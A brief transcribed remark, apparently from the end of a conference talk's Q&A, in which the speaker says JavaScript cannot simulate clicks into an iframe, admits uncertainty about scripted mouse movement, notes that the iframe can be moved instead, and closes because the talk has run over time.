I'm not sure, I don't know. So the question is, you know that JavaScript doesn't let you simulate a click into an iframe. The question is, can you move the mouse? I don't know about JavaScript mouse movement permissions well enough to tell you that. You can move the iframe though, so it's probably about as good. And I'm over time already, so I'm probably done. I'll take more questions if you're around, but I'm not going to hold you here.